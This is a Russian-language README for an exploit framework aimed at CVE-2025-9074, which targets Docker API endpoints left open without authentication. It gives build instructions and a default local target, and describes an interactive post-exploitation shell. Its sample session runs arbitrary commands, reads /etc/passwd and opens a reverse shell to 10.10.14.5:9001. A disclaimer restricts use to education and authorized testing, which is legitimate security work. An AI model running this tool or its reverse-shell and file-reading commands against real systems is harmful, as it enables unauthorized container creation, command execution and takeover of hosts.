Docker API CVE-2025-9074 PoC (Proof-Of-Concept). Продвинутый фреймворк для эксплуатации CVE-2025-9074, нацеленный на неаутентифицированные конечные точки Docker API и оснащённый встроенной интерактивной командной оболочкой.
Многофункциональный фреймворк для эксплуатации CVE-2025-9074, нацеленный на неаутентифицированные Docker API-эндпоинты со встроенной интерактивной командной оболочкой.
Этот инструмент автоматизирует эксплуатацию незащищённых Docker API-инстансов без аутентификации, позволяя полностью создавать контейнеры и выполнять команды на целевом хосте. Инструмент оснащён собственной интерактивной оболочкой для удобной пост-эксплуатации.
Примечание: Это собственная реализация PoC. Я не обнаруживал CVE-2025-9074.

Автоматическое обнаружение уязвимости, загрузка образов, создание и инициализация контейнера

Пост-эксплуатационная оболочка с возможностью выполнения команд
git clone https://github.com/xwpdx0/poc-2025-9074
gcc poc.c -o poc-2025-9074
или вы можете скачать бинарный файл со страницы Релизы
./poc-2025-9074
Запуск против цели по умолчанию (127.0.0.1:2375):
./poc-2025-9074
Укажите собственный Docker API-эндпоинт:

После успешной эксплуатации интерактивная оболочка предоставляет следующие команды:
| Команда | Описание |
|---|---|
cmd <command> | Выполнение произвольных команд внутри контейнера |
revshell <ip> <port> | Развёртывание reverse shell на указанный слушатель |
info | Отображение информации о текущем контейнере и цели |
exit | Завершение интерактивной сессии |
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info
CVE-2025-9074 затрагивает Docker-инстансы с открытыми API-эндпоинтами, у которых отсутствуют надлежащие механизмы аутентификации. Эта ошибка конфигурации предоставляет неавторизованный доступ к демону Docker и позволяет:
Данный инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.
xwpd (@xwpdx0)
Лицензия MIT — подробности см. в файле LICENSE
Только для ответственного раскрытия уязвимостей и исследовательских целей в области безопасности.